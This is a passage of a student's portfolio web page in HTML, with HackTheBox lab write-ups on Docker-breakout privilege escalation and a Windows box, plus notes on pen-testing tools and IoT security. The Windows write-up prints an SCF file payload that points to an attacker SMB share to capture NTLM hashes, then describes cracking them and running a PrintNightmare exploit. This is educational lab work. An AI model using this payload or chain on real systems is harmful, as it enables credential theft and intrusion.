                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
